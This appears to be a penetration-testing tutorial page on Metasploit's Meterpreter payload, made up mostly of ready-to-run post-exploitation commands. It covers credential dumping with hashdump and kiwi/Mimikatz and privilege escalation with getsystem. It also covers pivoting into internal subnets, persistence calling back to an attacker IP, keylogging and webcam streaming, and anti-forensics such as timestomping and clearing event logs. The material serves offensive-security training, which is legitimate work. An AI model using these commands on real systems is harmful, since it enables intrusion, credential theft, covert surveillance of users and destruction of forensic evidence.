🐚 Meterpreter¶
Meterpreter (Meta-Interpreter) is Metasploit's most powerful payload. It runs entirely in memory (never touches disk), communicates over an encrypted channel, and provides a rich set of commands for post-exploitation — from file transfers and screenshot capture to privilege escalation, credential dumping, and network pivoting.
1️⃣ How Meterpreter Works¶
Unlike a basic shell, Meterpreter:
- Lives in memory: It injects itself into a running process and never writes to disk, making it harder for antivirus to detect.
- Uses encrypted communication: All traffic between your machine and the target is encrypted (TLS for
reverse_https, AES forreverse_tcp). - Is extensible: Functionality is loaded on demand via "extensions" (e.g.,
stdapi,priv,kiwi). - Supports migration: You can move Meterpreter from one process to another without dropping the session.
Concept
Because Meterpreter runs in memory and communicates over encrypted channels, it is significantly stealthier than a basic cmd.exe or /bin/sh reverse shell. However, the initial payload delivery (the stager) still touches disk briefly and may be detected by modern EDR solutions.
2️⃣ Core Commands¶
System Information¶
meterpreter > sysinfo # OS version, architecture, hostname
meterpreter > getuid # Current user
meterpreter > getpid # Current process ID
meterpreter > getprivs # List current privileges
meterpreter > ps # List running processes
meterpreter > idletime # How long the user has been idle
File System¶
meterpreter > pwd # Print working directory (on target)
meterpreter > cd C:\\Users # Change directory
meterpreter > ls # List files
meterpreter > cat secret.txt # Read a file
meterpreter > download C:\\Users\\admin\\Desktop\\flag.txt /tmp/flag.txt
meterpreter > upload /tmp/payload.exe C:\\Users\\admin\\Desktop\\payload.exe
meterpreter > edit file.txt # Open file in an editor
meterpreter > mkdir new_dir # Create a directory
meterpreter > rm file.txt # Delete a file
meterpreter > search -f *.txt -d C:\\Users # Search for files
Networking¶
meterpreter > ipconfig # Network interfaces (Windows)
meterpreter > ifconfig # Network interfaces (Linux)
meterpreter > route # Routing table
meterpreter > arp # ARP cache
meterpreter > netstat # Active connections
meterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.100 # Port forwarding
Process Management¶
meterpreter > ps # List processes
meterpreter > kill <pid> # Kill a process
meterpreter > execute -f cmd.exe -i -H # Execute a command (-i: interactive, -H: hidden)
meterpreter > shell # Drop to a system shell (cmd.exe or /bin/sh)
3️⃣ Process Migration¶
Migration moves the Meterpreter session from the currently exploited process into another process. This is critical for:
- Stability: If the exploited process (e.g., a browser) is closed by the user, your session dies. Migrating to a long-lived process (e.g.,
explorer.exe,svchost.exe) keeps your session alive. - Architecture matching: If you need a 64-bit Meterpreter but landed in a 32-bit process, migrate to a 64-bit process.
- Stealth: Moving to a system process makes your activity harder to detect.
# List processes and find a target
meterpreter > ps
# Migrate to a specific PID
meterpreter > migrate <pid>
# Auto-migrate to a recommended process
meterpreter > run post/windows/manage/migrate
Tip
After getting a Meterpreter session, migrate immediately before doing anything else. The exploited process is often unstable and may crash.
4️⃣ Privilege Escalation¶
Checking Current Privileges¶
meterpreter > getuid
# Server username: DESKTOP-ABC\user
meterpreter > getprivs
# Lists all privileges held by the current process token
getsystem (Quick Escalation)¶
meterpreter > getsystem
# Attempts several techniques to escalate to SYSTEM:
# 1. Named Pipe Impersonation (In Memory/Admin)
# 2. Named Pipe Impersonation (Dropper/Admin)
# 3. Token Duplication (In Memory/Admin)
Note
getsystem only works if your current user already has local administrator privileges. It escalates from Admin → SYSTEM. It will not work from a standard user account.
Using Local Exploit Suggesters¶
meterpreter > background
msf6 > use post/multi/recon/local_exploit_suggester
msf6 > set SESSION 1
msf6 > run
5️⃣ Credential Harvesting¶
Hashdump (SAM Database)¶
meterpreter > hashdump
# Dumps NTLM hashes from the SAM database
# Administrator:500:aad3b435...:31d6cfe0d...:::
Kiwi Extension (Mimikatz)¶
meterpreter > load kiwi
# Dump plaintext credentials from memory
meterpreter > creds_all
# Dump Kerberos tickets
meterpreter > kerberos_ticket_list
# Dump NTLM hashes
meterpreter > lsa_dump_sam
# Dump secrets from LSA
meterpreter > lsa_dump_secrets
Tip
load kiwi is the Meterpreter integration of Mimikatz. It requires SYSTEM privileges. Run getsystem first if you haven't already.
6️⃣ Pivoting & Port Forwarding¶
Meterpreter can use a compromised host as a pivot point to reach internal networks that aren't directly accessible from your attacker machine.
Adding Routes¶
# Background the session
meterpreter > background
# Add a route through the session to reach an internal subnet
msf6 > route add 172.16.0.0/24 1 # Session ID 1
# Now any Metasploit module targeting 172.16.0.0/24 will be routed through session 1
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 172.16.0.0/24
msf6 > set PORTS 21,22,80,445
msf6 > run
SOCKS Proxy (for non-Metasploit tools)¶
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVHOST 127.0.0.1
msf6 > set SRVPORT 1080
msf6 > run -j
# Now configure proxychains to use 127.0.0.1:1080
# Then run: proxychains nmap -sT 172.16.0.0/24
Port Forwarding¶
# Forward local port 8080 to a remote service
meterpreter > portfwd add -l 8080 -p 80 -r 172.16.0.10
# Now browse to http://127.0.0.1:8080 to access the internal web server
7️⃣ Persistence¶
To maintain access across reboots:
# Using the persistence post module
meterpreter > run persistence -U -i 30 -p 4444 -r 10.10.14.2
# -U: Start when user logs in
# -i 30: Reconnect every 30 seconds
# -p: Listener port
# -r: Listener IP
# Or use the more modern module
meterpreter > background
msf6 > use exploit/windows/local/persistence_service
msf6 > set SESSION 1
msf6 > set LHOST 10.10.14.2
msf6 > run
8️⃣ Capturing Screenshots & Keylogging¶
# Take a screenshot
meterpreter > screenshot
# Start a keylogger
meterpreter > keyscan_start
# Dump captured keystrokes
meterpreter > keyscan_dump
# Stop the keylogger
meterpreter > keyscan_stop
# Stream the target's webcam
meterpreter > webcam_snap
meterpreter > webcam_stream
9️⃣ Timestomping & Anti-Forensics¶
# Modify file timestamps (MACE values) to blend in
meterpreter > timestomp C:\\dropped_file.exe -m "01/01/2020 12:00:00"
meterpreter > timestomp C:\\dropped_file.exe -z "01/01/2020 12:00:00"
# Clear Windows event logs
meterpreter > clearev
🔟 Gotchas¶
Note
Meterpreter sessions can be detected. While Meterpreter is stealthier than a basic shell, modern EDR solutions (CrowdStrike, Defender ATP, SentinelOne) can detect Meterpreter's in-memory behavior patterns, especially the kiwi/Mimikatz extension. Always assume you may be detected.
Note
Process migration can fail. You cannot migrate to a process running under a different user unless you have SYSTEM privileges. Also, migrating between 32-bit and 64-bit processes requires the appropriate Meterpreter architecture.
Note
hashdump and kiwi require elevated privileges. You must be running as SYSTEM (or at least a local administrator) to dump credentials. Run getsystem first.
Note
clearev is obvious to forensic analysts. Clearing event logs creates a conspicuous gap in the log timeline. A more subtle approach is to selectively delete specific event entries.
Warning
Meterpreter provides extensive control over compromised systems. Use these capabilities responsibly and only with explicit written authorization.